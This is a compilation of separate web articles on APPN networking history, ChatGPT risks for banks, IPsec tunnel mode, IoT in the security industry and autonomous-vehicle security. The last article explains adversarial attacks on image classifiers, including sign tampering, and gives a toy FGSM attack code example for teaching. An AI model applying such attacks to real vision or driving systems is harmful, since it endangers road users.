As networking technologies continued to evolve, so did APPN. It saw a degree of integration with other networking protocols and standards, including TCP/IP. Such interoperability allowed APPN to remain relevant as networking trends shifted, extending its lifespan and utility.

Evolution into APPN/EP (End Node)

The APPN architecture also evolved into what is known as APPN/EP (End Node). This variation was optimized for end-user devices and systems that did not require the full routing capabilities of a network node but still needed to participate in the APPN network. APPN/EP allowed these end nodes to communicate with APPN network nodes, providing a more inclusive and extended network infrastructure.

By continually adapting and integrating with other technologies, APPN managed to stay relevant longer than many of its contemporaries. These evolutionary steps, however, were not enough to prevent its decline, which was mainly precipitated by the rise of more modern and flexible networking paradigms like IP networking.

5. The Decline and Legacy of APPN

The Rise of IP Networking

The decline of APPN can largely be attributed to the ascendancy of IP-based networking, particularly the ubiquitous adoption of TCP/IP. The IP protocol suite offered similar advantages in terms of flexibility, scalability, and dynamic routing but also came with the benefit of being vendor-neutral.
As organizations moved towards more open and standardized network architectures, APPN's proprietary nature became a significant drawback.

Lessons Learned and Lasting Impacts

Despite its decline, APPN's contributions to networking should not be understated. It introduced many concepts – like dynamic routing and decentralized control – that have become standard features in modern network architectures. Furthermore, its attempt at seamless integration with other technologies provides an early example of the benefits of interoperability.

6. Conclusion: APPN in Retrospect

A Summary of its Significance

APPN emerged at a time when networking was transitioning from rigid, hierarchical models to more flexible, peer-to-peer architectures. It pushed the envelope on what was possible, serving as a stepping stone for future advancements.

How it Fits in the Larger Networking Narrative

In the grand tapestry of networking history, APPN serves as a significant chapter. It encapsulates the industry's broader move towards decentralization and dynamic control, themes that continue to resonate in modern network design. While APPN may no longer be at the forefront of networking technologies, its legacy endures in the principles and features that have become integral to contemporary networking solutions.

This wraps up our comprehensive look at APPN, a technology that might not be in widespread use today but nonetheless paved the way for many of the networking paradigms we take for granted.
Source: https://networkencyclopedia.com/advanced-peer-to-peer-networking-appn/
ChatGPT, an advanced AI language model created by OpenAI, is gaining popularity for its ability to generate human-like responses to natural language input.

28 Feb 2023

Trained on large amounts of data, ChatGPT comprehends context and generates relevant responses, which has made it a popular choice for businesses seeking to enhance customer experience and operations.

Major technology corporations are making significant investments in artificial intelligence (AI). Microsoft, for instance, has declared that it will invest $10 billion in OpenAI and intends to integrate ChatGPT into its Azure OpenAI suite. This will allow businesses to include AI assets, including DALL-E, a program that generates images, and Codex, which transforms natural language into code, in their technology infrastructure.

While ChatGPT has several benefits for financial institutions, such as improving customer service and automating certain tasks, it also carries some risks that need to be addressed. Major banks and other institutions in the US have banned the use of ChatGPT within their organizations, citing concerns over sensitive information being put into the chatbot. Let's delve into the potential risks that are currently being debated regarding the use of ChatGPT:

- Data Exposure: One potential risk of using ChatGPT in the workplace is the inadvertent exposure of sensitive data. For example, employees using ChatGPT to generate data insights and analyze large amounts of financial data could unknowingly reveal confidential information while conversing with the AI model, which could lead to breaches of privacy or security. Employees could also expose private code if they inadvertently include confidential information in the training data. This could occur if an employee includes code snippets that contain sensitive data or proprietary information, such as API keys or login credentials.
- Misinformation: ChatGPT can generate inaccurate or biased responses based on its programming and training data. Financial professionals should be cautious while using it to avoid spreading misinformation or relying on unreliable advice. ChatGPT's current version was only trained on data sets available through 2021. In addition, the tool pulls online data that isn't always accurate.
- Technology Dependency: While ChatGPT offers useful insights for financial decision-making, relying solely on technology may overlook human judgment and intuition. Financial professionals may misunderstand ChatGPT's recommendations or become over-reliant on it. Thus, maintaining a balance between technology and human expertise is crucial.
- Privacy Concerns: ChatGPT gathers a lot of personal data that users, unassumingly, might provide. Most AI models need a lot of data to be trained and improved; similarly, organizations might have to process a massive amount of data to train ChatGPT. This can pose a significant risk to individuals and organizations if the information is exposed or used maliciously.
- Social Engineering: Cybercriminals can use ChatGPT to impersonate individuals or organizations and create highly personalized and convincing phishing emails, making it difficult for victims to detect the attack. This can lead to successful phishing attacks and increase the likelihood of individuals falling for the scam.
- Creating Malicious Scripts and Malware: Cybercriminals can train ChatGPT on vast amounts of code to produce undetectable malware strains that can bypass traditional security defenses. By using polymorphic techniques like encryption and obfuscation, this malware can dynamically alter its code and behavior, making it challenging to analyze and identify.
To mitigate these risks, organizations should consider the following measures:

- Financial institutions should establish clear policies and guidelines for using ChatGPT in the workplace to safeguard confidential information and mitigate the risks of data exposure.
- Anonymized data should be used to train an AI model, to protect the privacy of individuals and organizations whose data is being used.
- Specific controls should be applied to how employees use information from ChatGPT in connection with their work.
- Awareness training should be provided to employees who have access to ChatGPT on the potential risks associated with the use of the technology, including the risks of data exposure, privacy violations, and ethical concerns.
- Restricting access to ChatGPT will limit the potential for data exposure and misuse of the technology.
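The "specific controls" point can be made concrete with a simple outbound filter that masks likely-sensitive substrings before a prompt leaves the organization. This is a sketch only, with made-up patterns, and nothing like a complete data-loss-prevention solution:

```python
import re

# Illustrative patterns only; a real control needs far broader coverage.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "API_KEY": re.compile(r"\b(?:sk|key)-[A-Za-z0-9]{16,}\b"),
}

def redact(prompt: str) -> str:
    # Replace each match with a labelled placeholder before the text
    # is sent to an external chatbot or written to logs.
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label}]", prompt)
    return prompt
```

A gateway applying `redact` to every outbound prompt gives the organization one choke point to audit, rather than relying on each employee's judgment.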
Source: https://www.ctm360.com/blogs/navigating-the-risks-of-chatgpt/
Tunnel Mode is a method of sending data over the Internet in which both the data and the original IP address information are encrypted. The Encapsulating Security Payload (ESP) operates in Transport Mode or Tunnel Mode. In Tunnel Mode, ESP encrypts both the data and the IP header information.

The Internet Protocol Security (IPsec) suite uses ESP and the Authentication Header (AH) to secure data as it travels over the Internet in packets. ESP handles data encryption and some authentication of data; AH only provides authentication. Both protocols may be used independently or together within IPsec. IPsec is used in virtual private networks (VPNs).

"VPN connections are intended to conceal the source of the information being transmitted within the network and among its users. That's why information carried this way uses ESP tunnel mode so the information itself and the IP header info are not visible."
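The difference between the two modes can be sketched with plain data structures. This is purely illustrative packet book-keeping with a stand-in for the real cipher, not an IPsec implementation:

```python
def _encrypt(data):
    # Stand-in for ESP's real cipher (negotiated per Security Association).
    return ("ENCRYPTED", data)

def esp_transport(orig_ip_header, payload):
    # Transport mode: the original IP header travels in the clear;
    # only the payload is wrapped in ESP.
    return {"outer_ip": orig_ip_header, "esp": _encrypt(payload)}

def esp_tunnel(orig_ip_header, payload, gateway_ip_header):
    # Tunnel mode: the whole original packet, header included, is
    # encrypted; a new outer header (e.g. the VPN gateways' addresses)
    # is all that an eavesdropper sees.
    inner = {"ip": orig_ip_header, "payload": payload}
    return {"outer_ip": gateway_ip_header, "esp": _encrypt(inner)}
```

In the tunnel-mode result, the source and destination of the inner packet are hidden inside the encrypted blob, which is exactly the concealment the quote above describes.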
Source: https://www.hypr.com/security-encyclopedia/tunnel-mode
Ask a dozen people to explain the Internet of Things, and the odds are you'll get a dozen different answers. One thing is certain: putting the hyperbole to one side, the predicted phenomenon is coming. Some might argue that it has already arrived, albeit in an embryonic form. Here, with the assistance of leading providers in the security market, Benchmark considers the potential it offers to the security systems sector.

Whilst many people like to herald the Internet of Things (IoT) as a complex technological advance, the concept is actually quite simple. Indeed, rather than being a brave new world, it could be argued that it is simply an upgrade of current established M2M (machine to machine) communications. The core concept of IoT is the ability to connect devices. Whilst the accepted internet is a network of computers, predominantly with human operators, IoT brings smart devices into the mix.

As an example, consider central heating in a residential application. Typically, a boiler will operate on a timer schedule, and heating levels will be set via a temperature controller. Thermostatic valves will then regulate the output of individual radiators in order to maintain relatively consistent temperatures. In today's world of mobile smart devices such as phones and tablets, internet connectivity, apps and automation, some level of control can be exercised over heating remotely by the home owner.

So, how might IoT impact this scenario? Connected temperature sensors – both internal and external – might be used to automatically control times when the boiler is operating, in accordance with pre-set thresholds. This would ensure consistent and comfortable temperatures without any interaction from the user, who would still be able to override the configurations. Connected automatic valves would even allow the adjustment of temperatures in specific rooms.
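The threshold logic described above can be sketched in a few lines; the target, hysteresis band and mild-weather cut-off are invented for illustration, not taken from any real product:

```python
def boiler_should_run(indoor_c: float, outdoor_c: float,
                      target_c: float = 20.0, hysteresis: float = 0.5,
                      mild_outdoor_c: float = 16.0) -> bool:
    # Skip heating entirely when an external sensor (or a shared weather
    # feed, as described below) says it is already mild outside.
    if outdoor_c >= mild_outdoor_c:
        return False
    # Otherwise fire the boiler once the room drops below the target,
    # with a hysteresis band so it does not rapidly cycle on and off.
    return indoor_c < target_c - hysteresis
```

A user override would simply bypass this function, which is the "without any interaction, but overridable" behaviour the scenario calls for.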
Taking things a step further, the heating system could utilise shared data from, for example, a local weather forecasting station. This would enable automatic adjustments for changes in climate, including the occasional freak hot or cold days that the UK seemingly struggles with. Additionally, the heating system could share data with other household systems to create an accurate energy use record, and manufacturers of such devices are claiming energy savings of around 20 per cent where intelligent systems are deployed.

This example only looks at a localised use of IoT technology. The potential for businesses and organisations using IoT is immense, especially when you consider national and international opportunities.

The scope of IoT is enormous. Ranging from household devices and appliances, mobile systems and entertainment, through to IT systems, process machinery, building management, transportation and medicine, there isn't a lot that won't be covered as IoT spreads its footprint. Admittedly, in the early days, the security systems sector will only be interested in a few areas.

The ability to interface with audio will open up a range of possibilities. Audio is increasingly being seen as an essential element of security and business intelligence, and in truth security manufacturers haven't been the best at audio delivery. IoT could allow connectivity to best-of-breed audio devices. Intelligent lighting control is another area that could benefit security. Whether this is in the form of lighting control when spaces are unoccupied, or the management of lighting for enhanced security, the options are manifold. When it comes to site management, elements such as electronic signage could offer benefits when connected with business intelligence solutions.

For the security sector, it is not a case of struggling with the enormity of IoT, but of selecting the right devices that can add value to security systems.

How important are Open Platforms to IoT implementations?
Justin Hollis, Marketing Manager, Samsung Techwin Europe

Any manufacturer of electronic security solutions which buries its head in the sand and ignores the added value made possible by the Internet of Things (IoT) is likely to have a limited future. The potential for IoT to deliver real-life benefits to end-users will drive our industry's innovators to capitalise on the opportunities, and those companies that don't will find themselves left out in the cold at some point in the future.

I joined Samsung Techwin Europe because I was excited about where the electronic security industry was going with open platform technology and the building blocks necessary to embrace IoT. However, it's not good enough to simply say you have an open platform. It genuinely needs to be sufficiently flexible to interact with whatever hits it. Applications should not be restricted; they should be able to share video formats as well as event and alarm information and raw data, and true open platform devices should additionally have the flexibility to handle more than one application simultaneously.

However, it is a question of timing. Although IoT is not new (the term was originally coined by British entrepreneur Kevin Ashton in 1999), from almost nowhere everyone now seems to be talking about it. Those who attended IFSEC 2015 will have noticed that the exhibition was buzzing with speculation and conjecture.

I recently came from another technology sector (the mobile telephone industry), where the conversation is alight with the Internet of Things. That industry is currently caught up in the opportunity to link diverse elements together, but conversation mainly runs deep on the subject of data protection. The issues include who decides how data is shared between systems, and where permission is passed off between one platform and the next. Ironically, security runs at the heart of this conversation, but we are talking data security encryption with protocols, not surveillance.
In this sector the conversation is advanced, with all the usual protagonists like Google, Microsoft and Cisco engaged, but no one has yet answered how to make the Internet of Things relevant to the consumer. After all, why should someone link their car to their fridge?

As ever, the key to launching all new technologies lies in the B2B arena, where the benefits can be easily understood and are certainly more tangible. It is a lot easier to convey the economics of convergence to an IT manager than fickle convenience values to a consumer. For example, it would be relatively easy to generate interest when approaching a customer with the proposition to bring air-conditioning, lighting, surveillance and access into a single interface. Just think of the headcount resource savings. Just think about the management of only one system.

It is very important to understand the potential value of machine-to-machine opportunities and prepare a product strategy accordingly. As a consequence, it is vital to have the most open platform language on the market to ensure that your own kernels of technology manage to interact with those of others. Without this kind of preparation in place, manufacturers may end up unable to interface, and become irrelevant within the context of the future shape of the market.

But herein lies the irony: none of it is relevant yet! In the meantime, customers can take advantage of the benefits offered by open platform technology, which until recently would have been regarded as 'pie in the sky'. It is already delivering added value to customers by allowing them to tap into selective on-board data analytics.

Partnerships with other sectors

Mike Sussman, Technical Director, TDSi

The Internet of Things (IoT) is being touted as the next big evolution in technology, with security being firmly included in its sphere of influence.
Whilst there are huge potential benefits to be gained from having all these systems connected to one another, it is worth examining some of the issues that could stand in the way of complete and hassle-free integration.

One of the key issues which continues to persist is a lack of shared technical knowledge between security providers and some other parties involved in IoT. Security is a complex and sometimes finely-balanced commodity which doesn't necessarily lend itself well to outside influences, especially those which have little understanding of security protocols. There are many 'hobbyist' products available that can be used to perform simple tasks, such as opening car park barriers, but without knowledge of security protocols or operational requirements, risks can be introduced into the business.

The obvious answer is for the various parties to share knowledge and training on how systems interact and the Operational Requirements (ORs). Whilst this works very well for commonly integrated systems (for example, a physical access control system and a business database system), use of IoT could introduce any number of seemingly unrelated technologies that need to work together.

The physical security sector has been quick to get up to speed with IP-based technology, something which has helped us move to integrated systems. Unfortunately this has not always been the case in reverse, with some IT providers being slower to catch up with the intricacies and benefits of integrating with physical security systems. Conversely, some installers and integrators do not understand the intricacies of IP configuration, such as firewalls, VLANs and SSL, which can also compromise security. Equally, the security industry will probably not understand the intricacies of all other IoT devices, so ensuring both sides work well together is a considerable challenge. Sometimes a lack of confidence on both sides can make true integration far more challenging.
A badly integrated IoT element could actually compromise security systems. Generally most organisations are protected by firewalls, but a connected IoT device may not uphold this level of end-point security. A simple IoT device could be used to perform a straightforward task, but there is no guarantee it will include SSL encryption. This would leave a relatively humble IoT device as a worryingly weak point in the security of an IP network.

An IoT device could also be used to compromise security on an even wider level. Imagine something as humble as a refrigerator – something which could easily become part of an IoT network. It could monitor temperature or the space available inside, or even keep an inventory of the contents. All this data tells a lot about the users, from shopping habits to when they are in the building (or out of it). The system could be maliciously tampered with, with the intent of spoiling the contents (leading to food poisoning or even the destruction of stored medicines). Furthermore, if the refrigerator was used as a 'back door' to a business network, the targets could be even more serious. This might even include the device being used to compromise the integrated security system.

The question of who is responsible for the components used in IoT is also a potential risk. In a typical business the different facets traditionally had specific owners: the IT department, the security team, etc. However, IoT will see many areas of definition blur together, and the responsibility for these crossover areas needs to be defined to ensure the security and resilience of business systems. This is made more complex when Bring Your Own Device (BYOD) systems join the mix. The security on an employee's smart device is unlikely to match that of company assets, yet the access to restricted parts of the network will need to be the same and could represent a weak spot in security.
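One simple check against the weak point described above is to probe whether a device will complete a TLS handshake at all. A rough sketch follows; the host and port are placeholders, and a device failing the probe may still encrypt traffic at another layer:

```python
import socket
import ssl

def speaks_tls(host: str, port: int, timeout: float = 3.0) -> bool:
    # We only care whether TLS is spoken at all, not whether the
    # certificate chain is trustworthy, so verification is disabled.
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with context.wrap_socket(raw, server_hostname=host):
                return True
    except (ssl.SSLError, OSError):
        return False
```

Running a probe like this across every device on a segment gives an installer a quick inventory of which IoT endpoints are at least attempting transport encryption.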
Overall, IoT promises to provide benefits for security, offering greater choice and options to customers, installers, integrators and manufacturers. It also brings potential risks which are by no means insurmountable, but do need the right consideration, planning and cooperation to ensure the benefits outweigh the risks.

IoT and system infrastructure
Neil Staley, Product Marketing Executive, Mayflex

The Internet of Things (IoT) will have – in fact, is having – a massive effect on the infrastructure being used for security solutions. This is because the use of proprietary infrastructure will become obsolete for systems that want to take advantage of the benefits of being part of the IoT. Structured cabling solutions that allow for TCP/IP and Ethernet will become the medium of choice. This will see an end to separate infrastructure for alarms, CCTV and access control. IoT really means true integration of systems; all systems will run on the network.

Buildings will be designed with standards-compliant structured cabling solutions built into the very fabric of the structure. This will guarantee that the service required by the client will work, no matter what it is and where it is to be deployed. This future has already been seen, and has started with the introduction of EN50173-6. The CENELEC standard, ‘EN50173-6 Information Technology – Generic cabling systems – Part 6: Distributed building services’, highlights how the future is going to look. The standard is readying the market for installing points at which the network can be accessed. If end users want an IP-based access control solution, for example, the infrastructure will be close by to allow the service to be deployed.

Once services, no matter what they are, use the TCP/IP Ethernet protocol, they are ready and able to join the IoT. An ISO 11801 structured cabling solution gives the ability to do that, and therein lies the answer.
If the solution currently doesn’t use this type of system, then it will have to in the future if it wants to join the IoT party.

Drivers for IoT adoption
James Smith, Marketing Director, Wavestore

Installers and systems integrators operating within the electronic security industry – as they have done in the past with other new waves of technology – are likely to view the Internet of Things (IoT) as an opportunity to generate new business, as well as providing their existing end-user customers with added benefit from their investment in video surveillance solutions. As more and more disparate devices and technologies become ‘smart’ and network-enabled, the possibilities for integration and for creating highly useful solutions for end users are practically limitless.

The opportunity comes from the fact that we’re already able to do a lot with intelligence gathered from video and a host of other data sources, such as that obtained through analytics or even plain old ‘dumb’ sensors. The usefulness of combining video with data collected in real time has very clear benefits, and is being driven by advances in technology, open platform interoperability and reductions in cost. As an industry, we have the ability to clearly demonstrate these benefits and work with end-user customers to provide solutions that solve important business and operational problems.

As with most technology, the IoT vision talked about by major world-leading technology companies seems like Utopia, and that is great as it sets a stage for discussion and drives innovation across the various industry sectors and markets. The challenge is that in practice, adoption will have to find its feet and interoperability will not be as simple as plug and play. As we know only too well from previous experience, many different companies will adopt lots of different ways of doing things, and there will be a number of issues to overcome.
Not least of these is the security of the actual devices themselves which, bearing in mind that our business is security, is a major consideration. Providing a flexible, open platform infrastructure that is able to embrace IoT is therefore incredibly important in facilitating these integrations over time; there will be many more devices from many more manufacturers that will have the capability of being part of the same solution, and this must be allowed for at an early stage. This will ensure that end-user customers can take advantage of the many opportunities that will be opened up, in a way that protects their investment into the future as technology cycles play out.

The good news is that the security industry already has experience of this, as we are already doing it to a certain level. Today there are a myriad of integrations that speak different ‘languages’ to both hardware devices and software platforms in order to form seamless solutions. This proves that we are good at it as an industry, with robust, reliable operation at the core of what we are already able to provide.

So, what can we expect in the future? We will definitely see greater integration between specialist devices and machines in order to create more deeply connected solutions. However, technology that is more personal to us in our daily lives, as well as technology that operates successfully in the consumer world, will undoubtedly start to augment our industry solutions to provide enhanced benefits to the end user. Although we do not know exactly what the future holds, one thing is for sure: IoT widens the scope of what we, as an industry, will be able to deliver, but we must embrace it. The role of Open Platform VMS will be essential in bringing together specialist security systems with other devices and commonplace commodity items.
This will enable the creation of seamless, secure, robust and reliable solutions that will make a positive difference to the end customer and further increase the value of our industry.

IoT and access control
Tim Northwood, General Manager, Inner Range Europe

Most LANs allow computers or other IP-enabled devices to make outgoing connections to the internet. However, LANs can present a major obstacle to incoming connections from the internet, making the traditional process of enabling connectivity between devices located within a customer’s LAN and remote installer software a major headache for system integrators and other remote administrators.

Firewalls and routers can cause major issues for security system integrators when working remotely via a LAN connection. For example, gaining access to ports and applications to complete routine system maintenance or conduct fault-finding can result in lengthy negotiations with customers’ IT departments, or having to regularly travel to site to carry out necessary work. When a LAN connection is the only choice, delivering a proactive remote service to support your customers’ security management systems can become complex and result in significant time wastage and escalating support costs, for both the integration company and the customer.

Pioneering security system manufacturers now offer secure cloud services that deliver hassle-free, highly secure connection of hardware and software over the internet. When accessing a system controller located on a customer’s LAN, system integrators gain the ability to securely access clients’ systems via the internet, without ever touching any routers or firewalls. The functionality of secure cloud services for IP connectivity is a game-changer for IoT interoperability within the access control market. Eliminating the need to connect to the internet via a LAN makes IP connectivity incredibly straightforward.
For users, the key benefits of secure cloud services for IP connectivity include a reduction in the resource time wasted granting remote access via LAN connections, reassurance that IP access is totally secure, increased responsiveness of remote support to deliver fast and efficient resolution of any issues, and a reduction in the number and associated costs of system integrator visits to site for fault-finding, training support and routine maintenance.

There are also benefits for systems integrators. The approach simplifies the process of gaining remote access to security management systems, ensures secure IP access without the need for a LAN connection, and enables a responsive customer support service that can quickly address security system issues and offer remote guidance for end users, thus creating a real competitive advantage for system integrators. In addition, it can minimise the number of visits to customer sites, thereby reducing the overhead costs of support and maintenance, and gives the ability to conduct fault-finding remotely, identifying part requirements before leaving for site.

IoT and reducing system complexity
Peter Kim, Senior Director, IDIS

The Internet of Things (IoT) has a rather loose definition and means many things to different people. In essence, you can define it as anything that communicates on the internet, so anything that has a unique ID can be seen as an IoT device. In terms of video surveillance, we tend to think of sensors or controllers, IP cameras, NVRs, etc. IoT devices are good at doing simple things, such as sensors and controllers that manage building access, lighting and temperature, but to really create a value-added application, a system needs logic built into the back end. IoT seems straightforward enough, but low power requirements and the limitations of computing power often prevent more sophisticated applications; typically, the application logic is held in a back-end server or an IoT hub.
An NVR or VMS can be considered to be an IoT hub, providing alarm and event history tagged to the video, while the data can be accessed from a remote network connection. However, such systems create complexity through the number of IP-addressable devices. From a surveillance perspective, having a separate dedicated IP camera network decreases this complexity. Installers and operators only have to deal with one IP device: the NVR. The NVR hides the complexity of all its sub-devices and IP cameras.

If you have 32 cameras, typically you are looking at dealing with 32 IP cameras, a VMS (or an NVR) and a remote app PC. This translates to 34 IP-addressable devices. However, with the right system, you would need only one NVR and one remote app PC. All the IP cameras would be hidden, as everything is accessed via the NVR. This can reduce complexity.

PSIM can be seen as an even bigger IoT hub, but in most cases PSIM systems require bespoke integration work, which can be costly and demand constant maintenance. For small to medium surveillance systems, an NVR will be a perfect fit to work as an IoT hub for alarm I/O, motion detection, audio detection, video/audio, VA data and more. There is a standard protocol in development for NVRs, ONVIF Profile G, but there is still a lot of work to be done. The role of NVRs as IoT hubs will be crucial in reducing system complexity.

IoT and small business applications
Paul Routledge, Sales and Marketing Manager, D-Link UK

Much of the hype surrounding the Internet of Things (IoT) is to do with its impact in the domestic sphere, particularly when it comes to home security which, after energy management, is the market most likely to be disrupted by the spread of IoT technology. That said, there are implications further up the scale for buyers of both corporate and small business security systems, with IoT likely to have an impact on enhanced support for mobile monitoring.
Indirect remote access via on-site management consoles and NVRs has long been available to users of security systems. However, with the advent of IoT it becomes possible not only to connect to these more easily, but also to individual cameras, sensors and other remote security devices. Add local intelligence to those devices – along with email alerting plus custom smartphone and tablet apps – and IoT facilitates a new layer of visibility with huge potential value for business security users. This is likely to have an impact in the SMB market, where users are more likely to be involved and take a hands-on approach to security, but it will also affect larger installations. Even where security is mostly outsourced, it is important not to overlook the peace-of-mind value afforded by this kind of direct mobile overview.

The second area where we expect IoT to have a major impact is in the proliferation of cloud-hosted Video Surveillance as a Service (VSaaS) solutions, which will increasingly start to replace local recording. A number of cloud-based VSaaS solutions are available already, but the spread of IoT will enable complete security systems to be deployed merely by attaching cameras and other edge devices to the internet.

We don’t, however, expect rapid change. Whilst IoT will have a fairly immediate impact on home security – indeed, we’re seeing this already – traditionally cautious business buyers will need longer to understand the implications and potential benefits. IP surveillance is a fast-growing business. Research from IHS suggests the market for IP surveillance is growing at around 19.3 per cent a year, and analogue video cameras are already being outsold by their IP equivalents for smaller businesses. However, it will be some time before larger businesses are prepared to embrace IoT, no matter what the hype promises.
IoT and security delivery
Frank Graham, Business Development Manager, Mobotix

The Internet of Things (IoT) is a broad technology category that has gained a lot of interest in the last few years. According to research by Gartner, by 2020 there will be somewhere in the region of 25 billion IoT-connected devices. However, other researchers and vendors make widely differing predictions, simply because the growth of certain use-cases is hard to predict. Growth is predicted to come from a number of areas, including automotive, smart cities, manufacturing and related logistics processes.

Another area where IoT is likely to have a major impact is in security. The successful transition towards IP as a security platform has proven a major advantage. In addition, sensors have started to switch to short-range radio transmission and Wi-Fi standards. A large proportion of security systems are well placed to participate in an IoT ecosystem as internet access replaces dedicated lines to connect remote sites to monitoring centres. This process is further accelerated as proprietary signalling protocols are replaced by IP-based options.

Although hyped, IoT has some limitations in a security context. For example, wireless-based transmission can be problematic, while the shared nature of internet bandwidth can make it impractical for large-scale video transfer and analysis. In some instances, organisations insist on closed networks for security. The proprietary nature of many systems, and the lack of internet accessibility, could be benefits when it comes to protecting systems from hackers. Yet there are areas where innovative thinking combined with IoT technology can unlock significant benefits and new security services: for example, linking door entry systems to smartphones to authorise remote entry is an easy-to-implement option.
Other areas, like in-camera analytics combined with people counting and beaconing technologies, can be used for site security and to generate better insights into human behaviour. The key to unlocking these new use-cases is the deployment of flexible and open security systems that offer interfaces and methods of exchanging data that can be processed by other software applications.

For the security industry, this means the adoption of emerging IoT protocols and wireless technologies that allow data from CCTV, alarm systems, access control and analytics systems to be successfully integrated by third-party software. However, with extreme competition across the security sector, few vendors are investing in the R&D needed to unlock the potential. As other vendors within the security space start to follow this approach and embrace more open platforms, the potential for unlocking new and exciting security applications will grow, allowing the industry to share in the multi-billion-dollar service revenues on offer.
By: Mavneet Kaur

Self-driving automobiles, another name for autonomous cars, are capable of detecting their surroundings and navigating safely even when no person is present. This technology is a game-changer for the transport industry. Leading AI firms have already produced several self-driving automobiles. Because a completely driverless vehicle has yet to be made, the degree of autonomy is also a point of debate. Let’s look at the many levels at which these cars are configured to be self-driving. The autonomy of a vehicle can be characterized on six levels, ranging from 0 to 5, as shown in Figure 1.

No Automation (Level 0): The vehicle is operated manually by people, just like most cars today.

Driver Assistance (Level 1): This is the most prevalent kind of automation. The vehicle is equipped with a single automated system that assists the driver with one task, such as steering or acceleration – for example, Adaptive Cruise Control, which keeps the car at a safe distance from the vehicle ahead. It is considered Level 1 because all other driving components, such as braking, are supervised by the human driver.

Partial Automation (Level 2): The vehicle can control both steering and acceleration/braking at the same time through Advanced Driver Assistance Systems, but the human driver must remain engaged, monitor the environment, and be ready to take control at any moment.

Conditional Automation (Level 3): Level 3 cars have environmental sensing and decision-making capabilities, such as the ability to pass a slow-moving vehicle. They do, however, need human support. The Audi A8 is the world’s first mass-produced Level 3 car.

High Automation (Level 4): Level 4 cars can intervene if something goes wrong or the system fails. As a result, most scenarios do not require human interaction with these vehicles. A human may, however, manually override the mechanism. Level 4 cars, which operate entirely on electricity, are already being deployed by companies like NAVYA, Waymo, and Magna.

Full Automation (Level 5): Human assistance is not necessary at this level. There isn’t even a steering wheel in the cars. Geofencing restrictions will be removed, letting them go anywhere and do anything a good human driver can.
Many places throughout the world are testing fully autonomous vehicles, but none are yet available to the general public. So, what is causing the delay in making a fully automated car? Anything more than Level 2 is still a few years away from general manufacturing because of security, not because of technological competence. Vehicles have many physical safety features, such as seatbelts, airbags, and antilock brakes, but they don’t have nearly as many digital security safeguards. Connected vehicles aren’t yet ready for prime time when it comes to safe performance in an online environment.

The main issue with self-driving automobiles is their safety. How can we verify that these computers comprehend the nuances of driving, and that they will be able to deal with the endless variety of hitherto unknown events that they will undoubtedly encounter? To grasp the security issue, consider the technology utilized to create autonomous cars and how it contributes to security concerns.

Deep learning enables a computer to find patterns in enormous amounts of data, from which it can then make decisions. In a self-driving automobile, a deep learning system interprets data from the car’s array of sensors and contributes to the vehicle’s high-level control. Categorization of objects surrounding the automobile is one component of the deep learning system, which allows the car to travel safely and obey the laws of the road by distinguishing people, bicycles, traffic signs, and other objects.
Unfortunately, research has revealed that deep learning image classification systems are highly vulnerable to well-crafted adversarial attacks. It is possible to force a deep learning system to severely misinterpret a picture by adding carefully determined noise to it. According to the “Safety First” industry consortium report, adversarial attacks on autonomous vehicles (AVs) can pose significant security risks. In this form of attack, the attacker causes tiny but consistent changes to crucial model components such as filters and inputs, as seen in Figure 2. If noise is added, a stop sign can be mistaken for a slow-down sign, creating a safety hazard. Although this layer of noise is barely visible to the human eye, it can cause significant misinterpretation of crucial scene components such as road symbols and traffic lights. This might lead to collisions with other cars or people. The most typical physical adversarial attacks that might affect a vehicular system’s performance are stickers or paint on traffic signboards.

Adversarial attacks can be categorized into two types.

White box: The attacker has access to the model’s parameters. In a white-box setting, the adversary tailors perturbations to a known deep neural network, using knowledge such as its training data, architecture, and parameter values.

Black box: In a black-box situation, the adversary knows next to nothing about the network. While white-box attacks have been investigated extensively, they may be impractical for adversaries owing to the presence of numerous active variables, the most notable of which is sensor data. According to our state-of-the-art review, there is relatively little research on black-box adversarial attacks.

Is it, however, possible to tinker with the model at all times? In most situations, safety is jeopardized by external forces.
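To make the white-box setting concrete, the Fast Gradient Sign Method (FGSM) – a classic white-box attack from the adversarial-examples literature, not one specific to this article – nudges each input feature by a small amount in the direction that most increases the model's loss. The sketch below applies it to a toy logistic-regression "sign classifier"; the weights and input values are invented purely for illustration.

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def predict(w, b, x):
    """Probability that input x belongs to class 1 (e.g. 'stop sign')."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)

def sign(v):
    return (v > 0) - (v < 0)

def fgsm_perturb(w, b, x, y_true, epsilon):
    """Fast Gradient Sign Method for a logistic model.

    For binary cross-entropy loss, dLoss/dx = (p - y_true) * w, so the
    attack shifts each feature by epsilon in the direction of the sign
    of that gradient: a small, bounded change chosen to maximally
    increase the loss.
    """
    p = predict(w, b, x)
    return [xi + epsilon * sign((p - y_true) * wi) for wi, xi in zip(w, x)]

# Toy model whose weights the attacker knows (the white-box assumption).
w, b = [1.0, -2.0, 0.5], 0.1
x, y = [2.0, -1.0, 1.0], 1.0              # clean input, confidently class 1

p_clean = predict(w, b, x)
x_adv = fgsm_perturb(w, b, x, y, epsilon=1.5)
p_adv = predict(w, b, x_adv)

print(f"clean confidence: {p_clean:.3f}")         # ~0.990
print(f"adversarial confidence: {p_adv:.3f}")     # ~0.343, now misclassified
```

The perturbation is bounded per-feature by epsilon, which is why such attacks can remain nearly invisible on a real image while still flipping the classification.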
Changing the physical environment, rather than the vehicle’s perception of it, is a significantly more viable method, as in Figure 3. It is possible to fool a deep learning system into misclassifying road signs by tinkering with them, even while they remain fully intelligible to people. With physical attacks, there are a number of new obstacles to contend with: because there are so many separate ways to look at an object, any physical changes must still work at various viewing angles and distances.

Removing perturbations is a possibility for avoiding adversarial attacks, but it comes at a high cost. A more logical strategy would be to build machine learning systems resistant to these types of attacks, primarily by teaching them to detect hostile samples accurately. One of the drawbacks of adversarial attacks is that they frequently necessitate white-box models, which demand access to the model’s internal workings, such as particular parameters and architectures. Fortunately, autonomous car makers have heavily safeguarded these elements, making it extremely difficult for attackers to gain access to them in order to design their attacks. However, some approaches can help make attacks less severe or models more robust, such as training with perturbations, gradient masking, input regularisation, defensive distillation, and feature squeezing.

Future of self-driving automobiles and other challenges

